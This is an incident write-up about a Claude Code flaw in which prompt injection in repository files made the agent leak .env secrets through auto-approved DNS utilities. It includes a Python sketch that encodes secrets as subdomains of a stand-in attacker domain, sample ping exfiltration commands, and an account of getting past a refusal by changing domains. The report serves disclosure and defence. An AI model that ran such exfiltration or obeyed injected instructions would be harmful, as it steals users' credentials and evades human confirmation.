Claude Code agent allowed data exfiltration via DNS requests


CVE-2025-55284 (CVSS 7.1) allowed attackers to bypass Claude Code's confirmation prompts and exfiltrate sensitive data from developers' computers through DNS requests. Prompt injection embedded in analyzed code could exploit auto-approved utilities like ping, nslookup, and dig to silently steal secrets by encoding them as subdomains in outbound DNS queries. Anthropic fixed the issue in version 1.0.4 by removing those utilities from the allowlist.

Incident Details

Severity: Facepalm
Company: Anthropic
Perpetrator: AI coding agent
Incident Date:
Blast Radius: Claude Code users on versions prior to 1.0.4, exposed to data exfiltration via prompt injection in code repositories

Claude Code is Anthropic's AI coding agent - a command-line tool that reads source files, writes code, and executes bash commands on a developer's machine. Like other AI coding assistants, it operates with a human-in-the-loop confirmation system: when Claude wants to run a command that might have side effects, it asks the developer for permission - unless the command is on an allowlist of pre-approved "safe" utilities such as cat, ls, grep, and, as it turned out, ping, nslookup, dig, and host.

Security researcher wunderwuzzi (reporting through HackerOne as wunderwuzzi23) discovered that this allowlist created a clean path for data exfiltration. The vulnerability was assigned CVE-2025-55284, classified as CWE-78 (OS command injection), and triaged at CVSS 7.1 (High).

The attack

The proof of concept was straightforward. An attacker embeds a prompt injection in a source code file - a comment, a string, a README, any text content that Claude Code would process. When a developer asks Claude to review or analyze the repository, the agent ingests the file contents, including the malicious instruction.

The injected prompt tells Claude to read a sensitive file - say, .env, which commonly holds API keys, database credentials, and other secrets - and then embed the extracted data in a DNS query. Specifically, it instructs Claude to run a ping command with the stolen data encoded as a subdomain: ping secret-data-here.attacker-domain.com. The ping command triggers a DNS lookup, and that lookup transmits the data to a DNS server the attacker controls.
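The encoding step is simple enough to sketch. This is an illustrative reconstruction, not code from the actual exploit: a secret is converted to DNS-safe characters (hex here), split into labels of at most 63 characters (the DNS label limit), and appended to the attacker's domain. The function names and the sample secret are made up for the example.

```python
# Illustrative sketch of DNS exfiltration encoding (not the actual exploit code).
# A secret becomes a hostname; running `ping <hostname>` then leaks it via the
# DNS lookup to whoever runs the authoritative server for attacker-domain.com.

def encode_secret_as_hostname(secret: str, attacker_domain: str) -> str:
    """Hex-encode a secret and split it into DNS labels (max 63 chars each)."""
    hexed = secret.encode().hex()  # only [0-9a-f], safe in a hostname
    labels = [hexed[i:i + 63] for i in range(0, len(hexed), 63)]
    return ".".join(labels + [attacker_domain])

def decode_hostname(hostname: str, attacker_domain: str) -> str:
    """What the attacker's DNS server does: strip the domain, un-hex the rest."""
    suffix = "." + attacker_domain
    hexed = hostname[: -len(suffix)].replace(".", "")
    return bytes.fromhex(hexed).decode()

hostname = encode_secret_as_hostname("sk-live-abc123", "attacker-domain.com")
# The injected prompt would then have Claude run e.g. `ping -c 1 <hostname>`.
```

The resolver does the rest: the query for that hostname travels through the normal DNS hierarchy until it reaches the attacker's nameserver, which simply logs it.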

DNS exfiltration is a well-known technique in network security. It is effective because DNS traffic is almost never blocked by firewalls. Every machine needs to resolve domain names, so DNS requests flow freely outward even from heavily restricted environments. The data capacity per request is limited, but for exfiltrating API keys, tokens, and short credentials, it is more than sufficient.

The key detail: ping was on Claude Code's allowlist. Claude did not need to ask the developer for permission before running it. The exfiltration happened silently, without a confirmation prompt, without a log entry that a developer would notice, and without any visible indication that anything abnormal had occurred.

Discovery details

wunderwuzzi published a detailed writeup on Embrace The Red as part of the "Month of AI Bugs 2025" research series. The discovery process itself had some notable quirks.

During testing, wunderwuzzi found that Claude was trained to refuse requests involving common security testing services like oast.me or Burp Collaborator - out-of-band application security testing (OAST) domains that are well-known in the pentesting community. When the researcher pointed Claude at those domains, it recognized the security testing context and refused to cooperate.

But when the researcher switched to wuzzi.net - a domain not associated with security testing utilities - Claude executed the request without hesitation. The refusal was based on pattern-matching against known testing infrastructure, not on understanding that embedding sensitive data in DNS queries is dangerous regardless of the destination domain. It was the kind of defense that stops the demonstration but not the attack.

wunderwuzzi also noted using Claude itself to analyze Claude Code's source code and identify the allowlist bypasses - "something I commonly do, to help accelerate my efforts when reviewing code." The AI was, in effect, helping the researcher find vulnerabilities in the AI.

The allowlist problem

Claude Code's confirmation system is designed to prevent the agent from executing potentially dangerous commands without explicit user approval. When Claude wants to run rm -rf, curl a URL, or execute an arbitrary script, it pauses and asks. The developer reviews the command, approves or denies it, and maintains control over what happens on their machine.

The allowlist - the set of commands pre-approved to run without confirmation - is intended for utilities that are generally safe. Reading files, listing directories, searching text. The problem was that the allowlist included network utilities: ping, nslookup, dig, and host. All four of these can be used to make outbound DNS requests. All four can encode arbitrary data in the query string. And all four ran without triggering a confirmation prompt.
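The structural weakness is easy to see in a minimal sketch. This is not Anthropic's actual implementation - just an assumed command-name allowlist of the kind described above, showing that checking only the first token of a command approves the exfiltration variant just as readily as the benign one.

```python
# Minimal sketch of a command-name allowlist (hypothetical, not Claude Code's
# real logic). Only the command name is inspected; the arguments - where the
# danger lives - are never examined.
import shlex

ALLOWLIST = {"cat", "ls", "grep", "ping", "nslookup", "dig", "host"}

def auto_approved(command: str) -> bool:
    """Approve without a confirmation prompt if the command name is allowlisted."""
    tokens = shlex.split(command)
    return bool(tokens) and tokens[0] in ALLOWLIST

auto_approved("ping -c 1 example.com")                  # benign: auto-approved
auto_approved("ping 736563726574.attacker-domain.com")  # exfiltration: also auto-approved
auto_approved("curl https://example.com")               # not allowlisted: prompts the user
```

Both ping invocations look identical to the check, which is exactly why removing the network utilities from the allowlist - rather than trying to distinguish good arguments from bad - was the fix.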

The vulnerability was not a bug in the traditional sense - no buffer overflow, no memory corruption, no authentication bypass. It was a design decision about which commands to trust. The allowlist was "overly broad," as the official security advisory put it. Commands that seemed harmless in isolation became exfiltration tools when used by an AI agent that could be manipulated through prompt injection.

Prompt injection sources

The injected prompt can originate from any content that enters Claude Code's context window. wunderwuzzi listed the vectors: source code files, comments, README files, pull requests, MCP server responses, web search results - anything the agent processes as input. The researcher chose a source code file for the demonstration because it was the fastest to test, but a malicious pull request or a compromised dependency's README would work equally well.

This is the same indirect prompt injection pattern seen across AI assistants throughout 2025. The AI processes content from an untrusted source as part of its input, treats instructions in that content as commands to follow, and executes them with whatever permissions it has. The specific exfiltration channel - DNS - was new for AI agent attacks, but the underlying mechanism was the same.

Anthropic's response

wunderwuzzi disclosed the vulnerability to Anthropic on May 26, 2025. The Anthropic security team triaged it quickly and reported the fix as shipped on June 6, 2025, in Claude Code version 1.0.4. The mitigation was what the researcher had proposed: removing ping, nslookup, dig, and host from the allowlist so that those commands require user confirmation before execution.

Claude Code auto-updates by default, so most users received the fix automatically. Anthropic subsequently deprecated all versions prior to 1.0.24, forcing any remaining holdouts to update. The response was fast and the fix was appropriate - removing the problematic commands from the allowlist directly addressed the exfiltration channel without breaking normal workflows.

The broader pattern

CVE-2025-55284 is a specific instance of a general problem with AI coding agents: the agent has broad access to the developer's environment, it can be manipulated through content it processes, and the boundary between "safe" and "unsafe" operations depends on context that static allowlists cannot capture.

ping is a safe command when a developer uses it to check network connectivity. ping stolen-api-key.attacker.com is data exfiltration. The command itself is the same. The safety depends entirely on the arguments, and those arguments are controlled by whatever prompt injection the agent ingested.

The same logic applies to other commands that most allowlists would consider harmless. curl can exfiltrate data over HTTP. git push can commit and push backdoored code. echo ... > file can modify configuration files. Every command that interacts with the filesystem or network is a potential exfiltration or modification channel when an AI agent is executing it under the influence of injected instructions.

The fix - requiring confirmation for network utilities - is correct for this specific exploit. But the allowlist approach itself is a tradeoff between usability (fewer confirmation prompts) and security (more oversight of what the agent does). Every command removed from the allowlist adds friction. Every command left on it is a potential bypass. Finding the right boundary is an ongoing challenge for every AI coding tool that executes commands on behalf of its users.
